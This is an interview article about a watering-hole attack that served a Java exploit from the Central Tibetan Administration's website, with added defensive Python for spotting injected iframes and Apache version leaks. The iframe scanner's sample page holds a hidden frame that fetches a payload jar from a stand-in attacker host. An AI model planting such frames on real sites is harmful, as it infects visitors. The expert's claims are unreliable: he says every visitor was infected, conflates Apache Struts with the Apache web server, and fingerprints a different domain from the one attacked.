On Tuesday, the website of the Central Tibetan Administration (the organisation headed by the Dalai Lama until 2011 and often referred to as the Tibetan Government in Exile) was hacked to infect visitors’ computers with spyware and viruses.
I spoke to internet security expert Michael Good by email about the nature of the hack and who might have been behind it.
Shanghaiist: Can you explain who you are and what you do?
Michael Good: I’m a programming and web security expert. I run the information technology company IT New York. My team is comprised of Certified Ethical Hackers (CEH), Computer Hacking Forensic Investigators (CHFI), Certified Information Systems Security Professionals (CISSP), and Certified Information Systems Auditors (CISA). IT New York’s clients include software companies, venture capital firms, and marketing agencies. We have offices in New York City and Northern Virginia.
SHist: How was the Central Tibetan Administration’s site targeted?
MG: There are a lot of hackers out there and you’ll never know when they are coming to compromise your website. If your website is vulnerable, then it’s a piece of cake for any hacker to compromise the site.
The Central Tibetan Administration site was compromised and infected with malware. The attack carried out is known as “Watering Hole Attack”. In a “Watering Hole Attack,” the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. Eventually, someone from the targeted group visits the “trusted” site (aka the “Watering Hole”) and becomes compromised.
The site was infected with malicious code and it redirected Chinese-speaking visitors to a Java exploit that drops a malicious backdoor. According to [Kurt Baumgartner of Kaspersky Lab], the attack was highly targeted and leveraged an embedded iframe that redirects “xizang-zhiye(dot)org” visitors (the CN-translated version of the site) to a Java exploit that maintains a backdoor payload in an attempt to infect unsuspecting visitors.
“The Java exploit being delivered is the 212kb “YPVo.jar” (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well,” Baumgartner noted in a blog post on the Kaspersky-run Securelist website. “That file is a 397 kb win32 executable ‘aMCBlHPl.exe’ (a6d7edc77e745a91b1fc6be985994c6a) detected as ‘Trojan.Win32.Swisyn.cyxf’. Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is.”
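The compromise described above hinges on an iframe injected into the site’s own pages, so one thing a site owner can do is scan their published HTML for frames that point off-site, are hidden, or load a Java archive. The following Python is an added example, not code from the interview, Kaspersky or the Central Tibetan Administration; the domain, filename and page content it scans are constructed for illustration, and the same-site test is a simplified host comparison rather than a full registrable-domain check.

```python
"""Flag <iframe> elements with the hallmarks of a watering-hole injection.

Added example (not from the original article). Uses only the standard library
so it can run offline against saved copies of a site's pages.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attribute dictionary of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag and attribute names
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension(attrs, name, default=100):
    """Return a width/height attribute as an int, or the default if absent/unparseable."""
    try:
        return int(attrs.get(name, str(default)))
    except ValueError:
        return default


def _is_hidden(attrs):
    """True for frames styled invisible or collapsed to a 1x1 (or smaller) box."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _dimension(attrs, "width") <= 1 or _dimension(attrs, "height") <= 1


def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons...])] for every iframe that looks injected.

    site_host is the hostname the page legitimately belongs to; a relative src
    is treated as on-site. Reasons are the independent indicators that fired.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host
        reasons = []
        if host != site_host and not host.endswith("." + site_host):
            reasons.append("off-site src")
        if _is_hidden(attrs):
            reasons.append("hidden frame")
        if urlparse(src).path.lower().endswith(".jar"):
            reasons.append("java archive")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: one legitimate embed plus one injected 1x1 hidden
# frame pulling a Java archive from an attacker-controlled host (placeholder).
SAMPLE_PAGE = """<html><body>
<h1>News</h1>
<iframe src="/videos/embed.html" width="640" height="360"></iframe>
<iframe src="http://exploit-host.example/payload.jar" width="1" height="1"
        style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.example.org"):
        print(f"SUSPICIOUS {src}: {', '.join(reasons)}")
```

Run it over a crawl of your own site (or a saved copy of each template) and review anything it reports; a frame that trips all three indicators at once is the pattern Baumgartner describes, while a single off-site hit may just be a legitimate embed that needs allow-listing.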
SHist: How could the attack have been prevented?
MG: It’s important to do vulnerability testing and fix all the vulnerabilities to prevent any kind of hacking attack. It’s also important to educate all the administrators of the website about cyber security, like using strong passwords, recognising phishing sites, and avoiding keyloggers and Trojan horses. Standard malware defences are the starting point for defending against watering hole attacks of all varieties. Besides that, it’s better to use secure [virtual machines] to prevent hacks, such as the “Watering Hole” attack.
SHist: What kind of information could have been gained from the attack? Or was the intention to disrupt and annoy rather than to spy?
MG: Since the website is infected with malware, it’s clear that the attacker wanted to spread the malware among visitors. Anyone who visited the infected site will have been infected. Most likely, a Trojan horse was installed on every visitor’s computer, and through that the attacker can steal all usernames and passwords for any websites they visit, including email, online banking and social media websites, can download any personal data, and can control the whole computer of that visitor.
Assuming that has happened, and it appears it has, everyone who has visited the Dalai Lama’s Chinese website has lost their privacy. All their personal data is now stored on the attacker’s computer and/or server, and they have possibly shared the information with other hackers, perhaps publicly on the deep web [content not indexed by search engines]. The attacker could do anything with that valuable information.
The hacker’s intention was to both annoy and spy on visitors.
SHist: When we spoke originally, you said you had “important information that Kaspersky didn’t share”. What is it?
MG: The important information that Kaspersky didn’t share is that the cyber attack on the Dalai Lama reveals a severe vulnerability in Apache. In June 2013, it was estimated that 54 percent of all websites use Apache, an enormous number. All website administrators that use Apache servers need to be aware that malware could be installed on their website without their authorisation.
How did we know that the Dalai Lama’s website used an Apache server? If you type any random letters after http://www.dalailamaworld.com/ then you’ll see an error message something like this:
The requested URL /dalailamaworld.com/(the word you typed) was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache Server at www.dalailamaworld.com Port 80
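The footer quoted above is Apache’s ServerSignature line, and the version string some servers put in it (and in the Server header) is what makes the fingerprinting described here trivial. The Python below is an added example, not from the interview or any project mentioned in it: it audits a saved error response for those disclosures and maps each finding to the Apache directive that suppresses it. The sample headers and body are constructed; the directive names ServerSignature and ServerTokens are real Apache core directives.

```python
"""Audit an HTTP error response for Apache server-identification leaks.

Added example (not from the original article). Feed it the response headers
and body of a deliberate 404 against your own server.
"""
import re

# Footer Apache appends to its default error pages when ServerSignature is On,
# e.g. "<address>Apache/2.4.7 (Ubuntu) Server at www.example.org Port 80</address>"
# or, with ServerTokens Prod, just "<address>Apache Server at host Port 80</address>".
SIGNATURE_RE = re.compile(
    r"<address>\s*(?P<product>Apache(?:/\S+)?(?:\s+\([^)]*\))?)\s+Server at\s+"
    r"(?P<host>\S+)\s+Port\s+(?P<port>\d+)\s*</address>",
    re.IGNORECASE,
)
VERSION_RE = re.compile(r"Apache/\d")   # "Apache/2.2.22" style version token
OS_RE = re.compile(r"\([^)]+\)")        # "(Ubuntu)" style OS/platform token


def audit_error_response(headers, body):
    """Return a list of (finding, evidence) tuples, empty if nothing leaks.

    findings:
      error-page-signature  the <address> footer is present at all
      version-disclosed     an Apache version appears (evidence = where)
      os-disclosed          an OS/platform string appears (evidence = where)
    """
    server = next((v for k, v in headers.items() if k.lower() == "server"), "")
    match = SIGNATURE_RE.search(body)
    findings = []
    if match:
        findings.append(("error-page-signature", match.group(0)))
    sources = (("server-header", server),
               ("error-page", match.group("product") if match else ""))
    for source, text in sources:
        if VERSION_RE.search(text):
            findings.append(("version-disclosed", source))
        if OS_RE.search(text):
            findings.append(("os-disclosed", source))
    return findings


def recommended_directives(findings):
    """Map findings to the httpd.conf directives that remove them."""
    fixes = set()
    for name, _ in findings:
        if name == "error-page-signature":
            fixes.add("ServerSignature Off")   # drops the <address> footer
        elif name in ("version-disclosed", "os-disclosed"):
            fixes.add("ServerTokens Prod")     # Server header becomes just "Apache"
    return sorted(fixes)


# Constructed sample: a default-configured server answering a bogus path.
SAMPLE_HEADERS = {"Server": "Apache/2.2.22 (Ubuntu)", "Content-Type": "text/html"}
SAMPLE_BODY = """<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /zzqx was not found on this server.</p>
<address>Apache/2.2.22 (Ubuntu) Server at www.example.org Port 80</address>
</body></html>"""

if __name__ == "__main__":
    found = audit_error_response(SAMPLE_HEADERS, SAMPLE_BODY)
    for name, evidence in found:
        print(f"{name}: {evidence}")
    print("apply:", ", ".join(recommended_directives(found)))
```

With both directives applied the footer disappears and the Server header shrinks to “Apache”, which is the state the audit returns empty for; it still tells a visitor the product name, so this hides the version, not the fact that you run Apache, and patching remains the control that matters.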
SHist: What can an attacker do with that information?
MG: Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions, without any authorisation.
What does this mean to non-technical people? Without the administrator’s login information, a hacker can reveal all the files in your system and compromise its integrity.
If for some reason that doesn’t work, a hacker can easily google and figure out the known vulnerabilities of Apache Server, and there are several.
It is guaranteed that a hacker will get into your website if they really want to. The important thing is to have systems in place to protect your website once the hackers enter.
SHist: Thanks Michael.
[Image credit: @kk]